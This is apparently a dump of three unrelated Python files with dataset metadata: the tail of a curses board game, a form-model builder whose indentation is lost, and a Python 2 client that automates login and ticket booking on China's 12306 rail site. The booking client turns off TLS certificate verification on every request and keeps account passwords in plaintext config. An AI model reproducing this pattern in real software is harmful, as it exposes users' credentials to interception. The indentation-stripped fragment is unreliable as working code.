elif c == curses.KEY_RIGHT and xpos + 1 < board.X:
xpos += 1
elif c == curses.KEY_MOUSE:
mouse_id, mouse_x, mouse_y, mouse_z, button_state = curses.getmouse()
if (mouse_x > 0 and mouse_x < board.X + 1 and
mouse_y > 0 and mouse_y < board.Y + 1):
xpos = mouse_x - 1
ypos = mouse_y - 1
board.toggle(ypos, xpos)
else:
# They've clicked outside the board
curses.flash()
else:
# Ignore incorrect keys
pass
def main(stdscr):
keyloop(stdscr) # Enter the main loop
if __name__ == '__main__':
curses.wrapper(main)
| lgpl-3.0 | -7,308,566,763,295,885,000 | 33.301527 | 81 | 0.484917 | false |
jwilliamn/handwritten | extraction/FormatModel/CreatePage3Variable.py | 1 | 6106 | import pickle
from extraction.FormatModel.VariableDefinitions import *
from extraction.FormatModel.RawVariableDefinitions import *
import json
def jsonDefault(obj):
    return obj.__dict__
if __name__ == '__main__':
Page3 = Category('page3', 'pagina 3')
############
for r in range(1,6):
str_r = str(r)
if len(str_r) == 1:
str_r = '0'+str_r
P = Category('P'+str_r,'Persona '+str_r)
ap_paterno=Category('apellido_paterno','Apellido paterno')
variable_ap_paterno=Variable('pos_TL_BR','posicion final', None)
ap_paterno.addSubType(variable_ap_paterno)
ap_materno = Category('apellido_materno', 'Apellido materno')
variable_ap_materno = Variable('pos_TL_BR', 'posicion final', None)
ap_materno.addSubType(variable_ap_materno)
nombres = Category('nombres', 'nombres')
variable_nombres = Variable('pos_TL_BR', 'posicion final', None)
nombres.addSubType(variable_nombres)
fecha_nacimiento = Category('fecha_nacimiento', 'Fecha de nacimiento')
variable_fecha_nacimiento = Variable('pos_TL_BR', 'posicion final', None)
fecha_nacimiento.addSubType(variable_fecha_nacimiento)
edad_anhos = Category('edad_anhos', 'edad_anios')
variable_edad_anhos = Variable('pos_TL_BR', 'posicion final', None)
edad_anhos.addSubType(variable_edad_anhos)
edad_meses = Category('edad_meses', 'edad_meses')
variable_edad_meses = Variable('pos_TL_BR', 'posicion final', None)
edad_meses.addSubType(variable_edad_meses)
tipo_documento = Category('tipo_documento', 'tipo_documento')
variable_tipo_documento = Variable('pos_TL_BR', 'posicion final', None)
tipo_documento.addSubType(variable_tipo_documento)
numero_documento = Category('numero_documento', 'numero_documento')
variable_numero_documento = Variable('pos_TL_BR', 'posicion final', None)
numero_documento.addSubType(variable_numero_documento)
parentesco_jefe_hogar = Category('parentesco_jefe_hogar', 'parentesco_jefe_hogar')
variable_parentesco_jefe_hogar = Variable('pos_TL_BR', 'posicion final', None)
parentesco_jefe_hogar.addSubType(variable_parentesco_jefe_hogar)
num_nucleo_familiar = Category('num_nucleo_familiar', 'num_nucleo_familiar')
variable_num_nucleo_familiar = Variable('pos_TL_BR', 'posicion final', None)
num_nucleo_familiar.addSubType(variable_num_nucleo_familiar)
sexo = Category('sexo', 'sexo')
variable_sexo = Variable('pos_TL_BR', 'posicion final', None)
sexo.addSubType(variable_sexo)
estado_civil = Category('estado_civil', 'estado_civil')
variable_estado_civil = Variable('pos_TL_BR', 'posicion final', None)
estado_civil.addSubType(variable_estado_civil)
tipo_seguro = Category('tipo_seguro', 'tipo_seguro')
variable_tipo_seguro = Variable('pos_TL_BR', 'posicion final', None)
tipo_seguro.addSubType(variable_tipo_seguro)
lengua_materna = Category('lengua_materna', 'lengua_materna')
variable_lengua_materna = Variable('pos_TL_BR', 'posicion final', None)
lengua_materna.addSubType(variable_lengua_materna)
sabe_leer_escribir = Category('sabe_leer_escribir', 'sabe_leer_escribir')
variable_sabe_leer_escribir = Variable('pos_TL_BR', 'posicion final', None)
sabe_leer_escribir.addSubType(variable_sabe_leer_escribir)
nivel_educativo = Category('nivel_educativo', 'nivel_educativo')
variable_nivel_educativo = Variable('pos_TL_BR', 'posicion final', None)
nivel_educativo.addSubType(variable_nivel_educativo)
ultimo_grado_aprobado = Category('ultimo_grado_aprobado', 'ultimo_grado_aprobado')
variable_ultimo_grado_aprobado = Variable('pos_TL_BR', 'posicion final', None)
ultimo_grado_aprobado.addSubType(variable_ultimo_grado_aprobado)
ultimo_mes_era_un = Category('ultimo_mes_era_un', 'ultimo_mes_era_un')
variable_ultimo_mes_era_un = Variable('pos_TL_BR', 'posicion final', None)
ultimo_mes_era_un.addSubType(variable_ultimo_mes_era_un)
sector_desempenho = Category('sector_desempenho', 'sector_desempenho')
variable_sector_desempenho = Variable('pos_TL_BR', 'posicion final', None)
sector_desempenho.addSubType(variable_sector_desempenho)
presenta_discapacidad = Category('presenta_discapacidad', 'presenta_discapacidad')
variable_presenta_discapacidad = Variable('pos_TL_BR', 'posicion final', None)
presenta_discapacidad.addSubType(variable_presenta_discapacidad)
programa_social_beneficiario = Category('programa_social_beneficiario', 'programa_social_beneficiario')
variable_programa_social_beneficiario = Variable('pos_TL_BR', 'posicion final', None)
programa_social_beneficiario.addSubType(variable_programa_social_beneficiario)
#############
P.addSubType(ap_paterno)
P.addSubType(ap_materno)
P.addSubType(nombres)
P.addSubType(fecha_nacimiento)
P.addSubType(edad_anhos)
P.addSubType(edad_meses)
P.addSubType(tipo_documento)
P.addSubType(numero_documento)
P.addSubType(parentesco_jefe_hogar)
P.addSubType(num_nucleo_familiar)
P.addSubType(sexo)
P.addSubType(estado_civil)
P.addSubType(tipo_seguro)
P.addSubType(lengua_materna)
P.addSubType(sabe_leer_escribir)
P.addSubType(nivel_educativo)
P.addSubType(ultimo_grado_aprobado)
P.addSubType(ultimo_mes_era_un)
P.addSubType(sector_desempenho)
P.addSubType(presenta_discapacidad)
P.addSubType(programa_social_beneficiario)
Page3.addSubType(P)
with open('pagina3.json', 'w') as output:
json.dump(Page3, output, default=jsonDefault, indent=4)
Page3.describe(True) | gpl-3.0 | 2,086,762,254,357,249,800 | 44.237037 | 111 | 0.655748 | false |
huzhifeng/py12306 | py12306.py | 1 | 62739 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Standard-library imports
import argparse
import urllib
import time
import datetime
import sys
import re
import ConfigParser
import random
import smtplib
from email.mime.text import MIMEText
# Third-party libraries
import requests
from huzhifeng import dumpObj, hasKeys
# Set default encoding to utf-8
reload(sys)
sys.setdefaultencoding('utf-8')
requests.packages.urllib3.disable_warnings()
# Global variables
RET_OK = 0
RET_ERR = -1
MAX_TRIES = 3
MAX_DAYS = 60
stations = []
seatMaps = [
    ('1', u'硬座'),  # hard seat / no-seat (both use code '1')
('3', u'硬卧'),
('4', u'软卧'),
('7', u'一等软座'),
('8', u'二等软座'),
('9', u'商务座'),
('M', u'一等座'),
('O', u'二等座'),
('B', u'混编硬座'),
('P', u'特等座')
]
# Global helper functions
def printDelimiter():
print('-' * 64)
def getTime():
return time.strftime('%Y-%m-%d %X', time.localtime()) # 2014-01-01 12:00:00
def date2UTC(d):
# Convert '2014-01-01' to 'Wed Jan 01 00:00:00 UTC+0800 2014'
t = time.strptime(d, '%Y-%m-%d')
asc = time.asctime(t) # 'Wed Jan 01 00:00:00 2014'
# 'Wed Jan 01 00:00:00 UTC+0800 2014'
return (asc[0:-4] + 'UTC+0800 ' + asc[-4:])
def getCardType(key):
d = {
'1': u'二代身份证',
'2': u'一代身份证',
'C': u'港澳通行证',
'G': u'台湾通行证',
'B': u'护照'
}
return d[key] if key in d else u'未知证件类型'
def getTicketType(key):
d = {
'1': u'成人票',
'2': u'儿童票',
'3': u'学生票',
'4': u'残军票'
}
return d[key] if key in d else u'未知票种'
def getSeatType(key):
d = dict(seatMaps)
return d[key] if key in d else u'未知席别'
def selectSeatType():
    key = '1'  # default '1' = hard seat
while True:
print(u'请选择席别编码(即左边第一个英文字母):')
for xb in seatMaps:
print(u'%s: %s' % (xb[0], xb[1]))
key = raw_input().upper()
d = dict(seatMaps)
if key in d:
return key
else:
print(u'无效的席别类型!')
def checkDate(date):
m = re.match(r'^\d{4}-\d{2}-\d{2}$', date) # 2014-01-01
if m:
today = datetime.datetime.now()
fmt = '%Y-%m-%d'
today = datetime.datetime.strptime(today.strftime(fmt), fmt)
train_date = datetime.datetime.strptime(m.group(0), fmt)
delta = train_date - today
if delta.days < 0:
print(u'乘车日期%s无效, 只能预订%s以后的车票' % (
train_date.strftime(fmt),
today.strftime(fmt)))
return False
else:
return True
else:
return False
def selectDate():
fmt = '%Y-%m-%d'
week_days = [u'星期一', u'星期二', u'星期三', u'星期四', u'星期五', u'星期六', u'星期天']
now = datetime.datetime.now()
available_date = [(now + datetime.timedelta(days=i)) for i in xrange(MAX_DAYS)]
for i in xrange(0, MAX_DAYS, 2):
print(u'第%2d天: %s(%s)' % (
i + 1, available_date[i].strftime(fmt), week_days[available_date[i].weekday()])),
if i + 1 < MAX_DAYS:
print(u'\t\t第%2d天: %s(%s)' % (
i + 2, available_date[i + 1].strftime(fmt), week_days[available_date[i + 1].weekday()]))
else:
print('')
while True:
print(u'请选择乘车日期(1~%d)' % (MAX_DAYS))
index = raw_input()
if not index.isdigit():
print(u'只能输入数字序号, 请重新选择乘车日期(1~%d)' % (MAX_DAYS))
continue
index = int(index)
if index < 1 or index > MAX_DAYS:
print(u'输入的序号无效, 请重新选择乘车日期(1~%d)' % (MAX_DAYS))
continue
index -= 1
train_date = available_date[index].strftime(fmt)
return train_date
def getStationByName(name):
matched_stations = []
for station in stations:
if (
station['name'] == name
or station['abbr'].find(name.lower()) != -1
or station['pinyin'].find(name.lower()) != -1
or station['pyabbr'].find(name.lower()) != -1):
matched_stations.append(station)
count = len(matched_stations)
if count <= 0:
return None
elif count == 1:
return matched_stations[0]
else:
for i in xrange(0, count):
print(u'%d:\t%s' % (i + 1, matched_stations[i]['name']))
print(u'请选择站点(1~%d)' % (count))
index = raw_input()
if not index.isdigit():
print(u'只能输入数字序号(1~%d)' % (count))
return None
index = int(index)
if index < 1 or index > count:
print(u'输入的序号无效(1~%d)' % (count))
return None
else:
return matched_stations[index - 1]
def inputStation():
while True:
print(u'支持中文, 拼音和拼音缩写(如: 北京,beijing,bj)')
name = raw_input().decode('gb2312', 'ignore')
station = getStationByName(name)
if station:
return station
else:
print(u'站点错误, 没有站点"%s", 请重新输入.' % (name))
def selectTrain(trains):
trains_num = len(trains)
index = 0
    while True:  # loop until a valid train is chosen
index = raw_input()
if not index.isdigit():
print(u'只能输入数字序号,请重新选择车次(1~%d)' % (trains_num))
continue
index = int(index)
if index < 1 or index > trains_num:
print(u'输入的序号无效,请重新选择车次(1~%d)' % (trains_num))
continue
if trains[index - 1]['queryLeftNewDTO']['canWebBuy'] != 'Y':
print(u'您选择的车次%s没票啦,请重新选择车次' % (
trains[index - 1]['queryLeftNewDTO']['station_train_code']))
continue
else:
break
return index
class MyOrder(object):
'''docstring for MyOrder'''
def __init__(
self,
username='',
password='',
train_date='',
from_city_name='',
to_city_name=''):
super(MyOrder, self).__init__()
        self.username = username  # account name
        self.password = password  # password
        self.train_date = train_date  # travel date [2014-01-01]
        today = datetime.datetime.now()
        self.back_train_date = today.strftime('%Y-%m-%d')  # return date [2014-01-01]
        self.tour_flag = 'dc'  # one-way 'dc' / round trip 'wf'
        self.purpose_code = 'ADULT'  # adult ticket
        self.from_city_name = from_city_name  # departure city as typed in the query form
        self.to_city_name = to_city_name  # destination city as typed in the query form
        self.from_station_telecode = ''  # departure station telecode
        self.to_station_telecode = ''  # destination station telecode
        self.passengers = []  # passengers on this order, at most 5
        self.normal_passengers = []  # saved contacts of the account
        self.trains = []  # train list, refreshed by each ticket query
        self.current_train_index = 0  # index of the currently selected train
        self.captcha = ''  # image captcha answer
        self.orderId = ''  # order serial number
        self.canWebBuy = False  # True if at least one listed train is bookable
self.notify = {
'mail_enable': 0,
'mail_username': '',
'mail_password': '',
'mail_server': '',
'mail_to': [],
'dates': [],
'trains': [],
'xb': [],
'focus': {}
}
def initSession(self):
self.session = requests.Session()
self.session.headers = {
'Accept': 'application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)',
'Referer': 'https://kyfw.12306.cn/otn/index/init',
'Host': 'kyfw.12306.cn',
'Connection': 'Keep-Alive'
}
def updateHeaders(self, url):
d = {
'https://kyfw.12306.cn/otn/resources/js/framework/station_name.js': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/'
},
'https://kyfw.12306.cn/otn/login/init': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/'
},
'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=login&rand=sjrand&': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/login/init'
},
'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=passenger&rand=randp&': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'
},
'https://kyfw.12306.cn/otn/passcodeNew/checkRandCodeAnsyn': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/login/init',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/login/loginAysnSuggest': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/login/init',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/login/userLogin': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/login/init'
},
'https://kyfw.12306.cn/otn/index/init': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/login/init'
},
'https://kyfw.12306.cn/otn/leftTicket/init': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/index/init',
'Content-Type': 'application/x-www-form-urlencoded'
},
'https://kyfw.12306.cn/otn/leftTicket/log?': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'x-requested-with': 'XMLHttpRequest',
'Cache-Control': 'no-cache',
'If-Modified-Since': '0'
},
'https://kyfw.12306.cn/otn/leftTicket/query?': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'x-requested-with': 'XMLHttpRequest',
'Cache-Control': 'no-cache',
'If-Modified-Since': '0'
},
'https://kyfw.12306.cn/otn/leftTicket/queryT?': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'x-requested-with': 'XMLHttpRequest',
'Cache-Control': 'no-cache',
'If-Modified-Since': '0'
},
'https://kyfw.12306.cn/otn/login/checkUser': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'Cache-Control': 'no-cache',
'If-Modified-Since': '0',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/initDc': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'Content-Type': 'application/x-www-form-urlencoded',
'Cache-Control': 'no-cache'
},
'https://kyfw.12306.cn/otn/confirmPassenger/getPassengerDTOs': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/checkOrderInfo': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/getQueueCount': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/confirmSingleForQueue': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/queryOrderWaitTime?': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'x-requested-with': 'XMLHttpRequest'
},
'https://kyfw.12306.cn/otn/confirmPassenger/resultOrderForDcQueue': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn//payOrder/init?': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'Content-Type': 'application/x-www-form-urlencoded'
},
'https://kyfw.12306.cn/otn/queryOrder/initNoComplete': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn//payOrder/init?random=1417862054369'
},
'https://kyfw.12306.cn/otn/queryOrder/queryMyOrderNoComplete': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/queryOrder/initNoComplete',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
}
}
l = [
'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=login&rand=sjrand&',
'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=passenger&rand=randp&',
'https://kyfw.12306.cn/otn/leftTicket/log?',
'https://kyfw.12306.cn/otn/leftTicket/query?',
'https://kyfw.12306.cn/otn/leftTicket/queryT?',
'https://kyfw.12306.cn/otn/confirmPassenger/queryOrderWaitTime?',
'https://kyfw.12306.cn/otn//payOrder/init?'
]
for s in l:
if url.find(s) == 0:
url = s
if not url in d:
print(u'未知 url: %s' % url)
return RET_ERR
self.session.headers.update({'Referer': d[url]['Referer']})
keys = [
'Referer',
'Cache-Control',
'x-requested-with',
'Content-Type'
]
for key in keys:
if key in d[url]:
self.session.headers.update({key: d[url][key]})
else:
self.session.headers.update({key: None})
def get(self, url):
self.updateHeaders(url)
tries = 0
while tries < MAX_TRIES:
tries += 1
try:
r = self.session.get(url, verify=False, timeout=16)
except requests.exceptions.ConnectionError as e:
print('ConnectionError(%s): e=%s' % (url, e))
continue
except requests.exceptions.Timeout as e:
print('Timeout(%s): e=%s' % (url, e))
continue
except requests.exceptions.TooManyRedirects as e:
print('TooManyRedirects(%s): e=%s' % (url, e))
continue
except requests.exceptions.HTTPError as e:
print('HTTPError(%s): e=%s' % (url, e))
continue
except requests.exceptions.RequestException as e:
print('RequestException(%s): e=%s' % (url, e))
continue
except:
print('Unknown exception(%s)' % (url))
continue
if r.status_code != 200:
print('Request %s failed %d times, status_code=%d' % (
url,
tries,
r.status_code))
else:
return r
else:
return None
def post(self, url, payload):
self.updateHeaders(url)
if url == 'https://kyfw.12306.cn/otn/passcodeNew/checkRandCodeAnsyn':
if payload.find('REPEAT_SUBMIT_TOKEN') != -1:
self.session.headers.update({'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'})
else:
self.session.headers.update({'Referer': 'https://kyfw.12306.cn/otn/login/init'})
tries = 0
while tries < MAX_TRIES:
tries += 1
try:
r = self.session.post(url, data=payload, verify=False, timeout=16)
except requests.exceptions.ConnectionError as e:
print('ConnectionError(%s): e=%s' % (url, e))
continue
except requests.exceptions.Timeout as e:
print('Timeout(%s): e=%s' % (url, e))
continue
except requests.exceptions.TooManyRedirects as e:
print('TooManyRedirects(%s): e=%s' % (url, e))
continue
except requests.exceptions.HTTPError as e:
print('HTTPError(%s): e=%s' % (url, e))
continue
except requests.exceptions.RequestException as e:
print('RequestException(%s): e=%s' % (url, e))
continue
except:
print('Unknown exception(%s)' % (url))
continue
if r.status_code != 200:
print('Request %s failed %d times, status_code=%d' % (
url,
tries,
r.status_code))
else:
return r
else:
return None
def getCaptcha(self, url):
self.updateHeaders(url)
r = self.session.get(url, verify=False, stream=True, timeout=16)
with open('captcha.gif', 'wb') as fd:
for chunk in r.iter_content():
fd.write(chunk)
print(u'请输入4位图片验证码(回车刷新验证码):')
captcha = raw_input()
if len(captcha) == 4:
return captcha
elif len(captcha) != 0:
print(u'%s是无效的图片验证码, 必须是4位' % (captcha))
return None
else:
            return 1  # ask the caller to refresh the captcha
def initStation(self):
url = 'https://kyfw.12306.cn/otn/resources/js/framework/station_name.js'
r = self.get(url)
if not r:
print(u'站点数据库初始化失败, 请求异常')
return None
data = r.text
station_list = data.split('@')
if len(station_list) < 1:
print(u'站点数据库初始化失败, 数据异常')
return None
station_list = station_list[1:]
for station in station_list:
items = station.split('|') # bji|北京|BJP|beijing|bj|2
if len(items) < 5:
print(u'忽略无效站点: %s' % (items))
continue
stations.append({'abbr': items[0],
'name': items[1],
'telecode': items[2],
'pinyin': items[3],
'pyabbr': items[4]})
return stations
def readConfig(self, config_file='config.ini'):
cp = ConfigParser.ConfigParser()
try:
cp.readfp(open(config_file, 'r'))
except IOError as e:
print(u'打开配置文件"%s"失败啦, 请先创建或者拷贝一份配置文件config.ini' % (config_file))
raw_input('Press any key to continue')
sys.exit()
self.username = cp.get('login', 'username')
self.password = cp.get('login', 'password')
self.train_date = cp.get('train', 'date')
self.from_city_name = cp.get('train', 'from')
self.to_city_name = cp.get('train', 'to')
self.notify['mail_enable'] = int(cp.get('notify', 'mail_enable'))
self.notify['mail_username'] = cp.get('notify', 'mail_username')
self.notify['mail_password'] = cp.get('notify', 'mail_password')
self.notify['mail_server'] = cp.get('notify', 'mail_server')
self.notify['mail_to'] = cp.get('notify', 'mail_to').split(',')
self.notify['dates'] = cp.get('notify', 'dates').split(',')
self.notify['trains'] = cp.get('notify', 'trains').split(',')
self.notify['xb'] = cp.get('notify', 'xb').split(',')
for t in self.notify['trains']:
self.notify['focus'][t] = self.notify['xb']
        # validate the departure station
        station = getStationByName(self.from_city_name)
        if not station:
            print(u'出发站错误, 请重新输入')
            station = inputStation()
        self.from_city_name = station['name']
        self.from_station_telecode = station['telecode']
        # validate the destination station
        station = getStationByName(self.to_city_name)
        if not station:
            print(u'目的站错误,请重新输入')
            station = inputStation()
        self.to_city_name = station['name']
        self.to_station_telecode = station['telecode']
        # validate the travel date
        if not checkDate(self.train_date):
            print(u'乘车日期无效, 请重新选择')
            self.train_date = selectDate()
        # parse passenger info from the config file
self.passengers = []
index = 1
passenger_sections = ['passenger%d' % (i) for i in xrange(1, 6)]
sections = cp.sections()
for section in passenger_sections:
if section in sections:
passenger = {}
passenger['index'] = index
                passenger['name'] = cp.get(section, 'name')  # required
                # ID type: optional, default '1' (second-generation ID card)
                passenger['cardtype'] = cp.get(section, 'cardtype') \
                    if cp.has_option(section, 'cardtype') else '1'
                passenger['id'] = cp.get(section, 'id')  # required
                # mobile phone number
                passenger['phone'] = cp.get(section, 'phone') \
                    if cp.has_option(section, 'phone') else '13800138000'
                # seat type: optional, default '1' (hard seat)
                passenger['seattype'] = cp.get(section, 'seattype') \
                    if cp.has_option(section, 'seattype') else '1'
                # ticket type: optional, default '1' (adult)
                passenger['tickettype'] = cp.get(section, 'tickettype') \
                    if cp.has_option(section, 'tickettype') else '1'
self.passengers.append(passenger)
index += 1
def printConfig(self):
printDelimiter()
print(u'订票信息:\n%s\t%s\t%s--->%s' % (
self.username,
self.train_date,
self.from_city_name,
self.to_city_name))
printDelimiter()
th = [u'序号', u'姓名', u'证件类型', u'证件号码', u'席别', u'票种']
print(u'%s\t%s\t%s\t%s\t%s\t%s' % (
th[0].ljust(2), th[1].ljust(4), th[2].ljust(5),
th[3].ljust(12), th[4].ljust(2), th[5].ljust(3)))
for p in self.passengers:
print(u'%s\t%s\t%s\t%s\t%s\t%s' % (
p['index'],
p['name'].decode('utf-8', 'ignore').ljust(4),
getCardType(p['cardtype']).ljust(5),
p['id'].ljust(20),
getSeatType(p['seattype']).ljust(2),
getTicketType(p['tickettype']).ljust(3)))
def checkRandCodeAnsyn(self, module):
d = {
            'login': {  # login captcha
'rand': 'sjrand',
'referer': 'https://kyfw.12306.cn/otn/login/init'
},
            'passenger': {  # order-confirmation captcha
'rand': 'randp',
'referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'
}
}
if not module in d:
print(u'无效的 module: %s' % (module))
return RET_ERR
tries = 0
while tries < MAX_TRIES:
tries += 1
url = 'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=%s&rand=%s&' % (module, d[module]['rand'])
if tries > 1:
url = '%s%1.16f' % (url, random.random())
print(u'正在等待验证码...')
self.captcha = self.getCaptcha(url)
if not self.captcha:
continue
            if self.captcha == 1:  # a refresh does not count as an attempt
tries -= 1
continue
url = 'https://kyfw.12306.cn/otn/passcodeNew/checkRandCodeAnsyn'
parameters = [
('randCode', self.captcha),
('rand', d[module]['rand'])
]
if module == 'login':
parameters.append(('randCode_validate', ''))
else:
parameters.append(('_json_att', ''))
parameters.append(('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken))
payload = urllib.urlencode(parameters)
print(u'正在校验验证码...')
r = self.post(url, payload)
if not r:
print(u'校验验证码异常')
continue
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"result":"1","msg":"randCodeRight"},"messages":[],"validateMessages":{}}
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['result', 'msg'])
and (obj['data']['result'] == '1')):
print(u'校验验证码成功')
return RET_OK
else:
print(u'校验验证码失败')
dumpObj(obj)
continue
else:
return RET_ERR
def login(self):
url = 'https://kyfw.12306.cn/otn/login/init'
r = self.get(url)
if not r:
print(u'登录失败, 请求异常')
return RET_ERR
if self.session.cookies:
cookies = requests.utils.dict_from_cookiejar(self.session.cookies)
if cookies['JSESSIONID']:
self.jsessionid = cookies['JSESSIONID']
if self.checkRandCodeAnsyn('login') == RET_ERR:
return RET_ERR
print(u'正在登录...')
url = 'https://kyfw.12306.cn/otn/login/loginAysnSuggest'
parameters = [
('loginUserDTO.user_name', self.username),
('userDTO.password', self.password),
('randCode', self.captcha),
('randCode_validate', ''),
#('ODg3NzQ0', 'OTIyNmFhNmQwNmI5ZmQ2OA%3D%3D'),
('myversion', 'undefined')
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'登录失败, 请求异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"loginCheck":"Y"},"messages":[],"validateMessages":{}}
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['loginCheck'])
and (obj['data']['loginCheck'] == 'Y')):
print(u'登陆成功^_^')
url = 'https://kyfw.12306.cn/otn/login/userLogin'
parameters = [
('_json_att', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
return RET_OK
else:
print(u'登陆失败啦!重新登陆...')
dumpObj(obj)
return RET_ERR
def getPassengerDTOs(self):
url = 'https://kyfw.12306.cn/otn/confirmPassenger/getPassengerDTOs'
parameters = [
('', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'获取乘客信息异常')
return RET_ERR
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['normal_passengers'])
and obj['data']['normal_passengers']):
self.normal_passengers = obj['data']['normal_passengers']
return RET_OK
else:
print(u'获取乘客信息失败')
if hasKeys(obj, ['messages']):
dumpObj(obj['messages'])
if hasKeys(obj, ['data']) and hasKeys(obj['data'], ['exMsg']):
dumpObj(obj['data']['exMsg'])
return RET_ERR
def selectPassengers(self, prompt):
if prompt == 1:
print(u'是否重新选择乘客?(如需选择请输入y或者yes, 默认使用配置文件提供的乘客信息)')
act = raw_input()
act = act.lower()
if act != 'y' and act != 'yes':
self.printConfig()
return RET_OK
if not (self.normal_passengers and len(self.normal_passengers)):
tries = 0
while tries < MAX_TRIES:
tries += 1
if self.getPassengerDTOs() == RET_OK:
break
else:
print(u'获取乘客信息失败次数太多, 使用配置文件提供的乘客信息')
return RET_ERR
num = len(self.normal_passengers)
for i in xrange(0, num):
p = self.normal_passengers[i]
print(u'%d.%s \t' % (i + 1, p['passenger_name'])),
if (i + 1) % 5 == 0:
print('')
while True:
print(u'\n请选择乘车人(最多选择5个, 以逗号隔开, 如:1,2,3,4,5, 直接回车不选择, 使用配置文件中的乘客信息)')
buf = raw_input()
if not buf:
return RET_ERR
            pattern = re.compile(r'^[0-9,]*\d$')  # digits and commas only, must end with a digit
if pattern.match(buf):
break
else:
print(u'输入格式错误, 只能输入数字和逗号, 并且必须以数字结束, 如:1,2,3,4,5')
ids = buf.split(',')
if not (ids and 1 <= len(ids) <= 5):
return RET_ERR
seattype = selectSeatType()
ids = [int(id) for id in ids]
del self.passengers[:]
for id in ids:
if id < 1 or id > num:
print(u'不存在的联系人, 忽略')
else:
passenger = {}
id = id - 1
passenger['index'] = len(self.passengers) + 1
passenger['name'] = self.normal_passengers[id]['passenger_name']
